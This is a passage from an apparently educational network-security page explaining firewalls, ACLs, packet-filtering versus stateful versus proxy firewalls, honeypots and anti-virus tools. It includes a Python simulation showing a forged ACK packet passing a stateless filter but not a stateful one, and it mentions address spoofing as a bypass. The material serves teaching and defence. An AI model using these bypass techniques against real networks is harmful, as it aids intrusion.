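    print("anomaly alerts:", anomaly_alerts(DETECTION, threshold))  # ['10.0.0.9']
```

Neither method alone sees both events: the injected request is a single line that no rate model would notice, and the login flood contains nothing a signature could match. This is why production deployments run the two side by side, and why the baseline must be built from traffic that is known to be clean.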

Firewall and how it works
A firewall is a piece of software or hardware, often built into the router, that acts as the first line of defence for a network: it inspects traffic arriving from the internet or another network and either blocks it or allows it through to your computer, depending on the firewall's rule set, which is defined by the administrator. Many organisations place a dedicated firewall at the network edge in front of the router so that the router does not have to carry the filtering load. A firewall decides whether a packet is acceptable by matching it against its ACL (access control list), an ordered list of rules that compare fields of each packet, such as source and destination IP address, protocol and port numbers, and say whether to allow or deny it. Each packet consists of a header, which carries the source and destination IP addresses, and a payload. The link layer also adds a CRC (cyclic redundancy check) so the receiver can tell whether a frame arrived intact or was corrupted in transit, but that is an integrity check against transmission errors, not a security control: an attacker crafting packets computes a valid CRC like anyone else.

Different types of Firewall
The first generation of firewall was the packet filtering firewall, followed by the proxy (application-layer) firewall, and the current generation in general use is the stateful inspection firewall.

Packet Filtering Firewall
The first generation of firewall available to the public, and one of the most basic, was the packet filtering firewall, which checks every single packet against its rule set and controls what data can flow into and out of a network. It looks only at header fields (addresses, protocol, ports, TCP flags) and treats each packet in isolation, without examining the payload or remembering earlier packets, so an attacker can bypass it by crafting packets whose headers look like permitted traffic, for example by spoofing a trusted source address or by setting the ACK flag so that a packet looks like part of an existing connection.

Stateful Inspection Firewall
The current generation in general use is the stateful inspection firewall, which keeps a record (the state table) of every connection passing through it. When a packet arrives the firewall first checks whether it belongs to a connection already in the state table; if so it is passed with minimal further inspection, while a packet that starts a new connection is checked thoroughly against the rule set and, if permitted, a new entry is added to the table. Because the state table is updated for every connection that opens or closes, a stateful firewall is somewhat slower and uses more memory than simple packet filtering.

Proxy Firewall
The proxy firewall provides very strong control because all traffic in and out passes through the proxy, which terminates the client's connection and makes its own request on the client's behalf. This allows you to monitor who is visiting which websites and to block specific content easily, which is useful for organisations and schools. Security is also very good because the proxy can inspect every part of each request at the application layer, not just the headers, but this can slow down the whole network as every detail of the traffic is checked.
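As an added example for the packet-filtering and stateful inspection descriptions above (not code from the original page), here is a small Python model of both. The network addresses, the ACL and the five packets are constructed; the point is the forged ACK packet, which a stateless ACL that has to allow return traffic lets in, and which the stateful firewall denies because no connection in its state table matches it.

```python
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

INTERNAL = "10.0.0."  # assumed internal network prefix for the demo


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    proto: str = "tcp"
    syn: bool = False
    ack: bool = False


@dataclass(frozen=True)
class Rule:
    """One ACL entry matching on direction, protocol, destination port and
    ACK flag; None means 'any'. Rules are evaluated top-down, first match wins."""
    action: str
    direction: str
    proto: Optional[str] = None
    dport: Optional[int] = None
    ack: Optional[bool] = None

    def matches(self, pkt: Packet, direction: str) -> bool:
        return (self.direction == direction
                and (self.proto is None or self.proto == pkt.proto)
                and (self.dport is None or self.dport == pkt.dport)
                and (self.ack is None or self.ack == pkt.ack))


def direction_of(pkt: Packet) -> str:
    return "in" if pkt.dst.startswith(INTERNAL) else "out"


# Constructed policy: a web server on 10.0.0.10 accepts HTTPS, internal hosts
# may connect out over TCP, everything else is denied.
STATELESS_ACL = [
    Rule("allow", "in", "tcp", 443),
    Rule("allow", "out", "tcp"),
    Rule("allow", "in", "tcp", ack=True),  # needed so replies to outbound connections get in
    Rule("deny", "in"),
    Rule("deny", "out"),
]

STATEFUL_ACL = [
    Rule("allow", "in", "tcp", 443),
    Rule("allow", "out", "tcp"),
    Rule("deny", "in"),
    Rule("deny", "out"),
]


def packet_filter(acl: List[Rule], pkt: Packet) -> str:
    """First-generation behaviour: every packet judged alone against the ACL."""
    d = direction_of(pkt)
    for rule in acl:
        if rule.matches(pkt, d):
            return rule.action
    return "deny"


class StatefulFirewall:
    """Keeps a state table keyed on the 5-tuple. Packets of a known connection
    bypass the ACL; only packets that open a new connection are checked
    against it, and they create state if permitted."""

    def __init__(self, acl: List[Rule]):
        self.acl = acl
        self.state: Set[Tuple[str, int, str, int, str]] = set()

    def filter(self, pkt: Packet) -> str:
        fwd = (pkt.src, pkt.sport, pkt.dst, pkt.dport, pkt.proto)
        rev = (pkt.dst, pkt.dport, pkt.src, pkt.sport, pkt.proto)
        if fwd in self.state or rev in self.state:
            return "allow (established)"
        if pkt.proto == "tcp" and not (pkt.syn and not pkt.ack):
            return "deny (not a new connection)"  # mid-stream packet with no state
        action = packet_filter(self.acl, pkt)
        if action == "allow":
            self.state.add(fwd)
        return action


def run_scenario() -> List[str]:
    """Constructed packets: an outbound web request, its reply, a forged
    unsolicited ACK aimed at the client's port, and a legitimate inbound HTTPS."""
    fw = StatefulFirewall(STATEFUL_ACL)
    client_syn = Packet("10.0.0.5", 51000, "203.0.113.10", 80, syn=True)
    server_synack = Packet("203.0.113.10", 80, "10.0.0.5", 51000, syn=True, ack=True)
    forged_ack = Packet("198.51.100.7", 80, "10.0.0.5", 51000, ack=True)
    inbound_https = Packet("198.51.100.7", 40000, "10.0.0.10", 443, syn=True)
    return [
        fw.filter(client_syn),                     # allow: new outbound, state created
        fw.filter(server_synack),                  # allow (established): matches state
        fw.filter(forged_ack),                     # deny: no state for this 5-tuple
        packet_filter(STATELESS_ACL, forged_ack),  # allow: the stateless ACL cannot tell
        fw.filter(inbound_https),                  # allow: permitted new inbound
    ]


if __name__ == "__main__":
    for verdict in run_scenario():
        print(verdict)
```

The third rule in STATELESS_ACL is the classic compromise a packet filter has to make: without memory of which connections the inside opened, the only way to let replies back in is to trust the ACK flag, and any attacker can set that flag.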

HoneyPot
A honeypot is a computer that usually sits in the screened subnet or DMZ and attempts to attract attackers to it instead of to the actual production systems. Attackers will probe for web and database servers, so the administrator sets up a decoy server running the services and open ports that are popular targets, to draw the attackers' attention away from the real servers. Because nothing legitimate should ever connect to the honeypot, any interaction with it is suspicious, and monitoring it lets the administrator see what techniques the attackers are using, which in turn allows better protection of the real servers. Many organisations use an ordinary computer with honeypot software that makes it appear powerful and full of valuable data, so that it looks important and attracts the attackers.

Anti-Virus
A virus is a piece of malware that tries to harm your computer in various ways; anti-virus software picks up the malware that gets past the firewall. An anti-virus is a specialised scanning engine that checks the files on your computer, primarily by matching them against a database of signatures of known malware and increasingly also by looking for suspicious behaviour, and then notifies the user and quarantines or removes the malicious file. It is important to keep your anti-virus, and especially its signature database, updated and to scan your computer for threats regularly, since a signature-based scanner cannot recognise malware it has no signature for.
Anti spyware
Anti-spyware is similar to anti-virus: it helps to block and prevent spyware and related malware infections. It monitors incoming data from emails, websites and file downloads and stops spyware programs from installing themselves into the operating system, and it can also scan for and remove spyware that is already present; most modern anti-virus products include this function.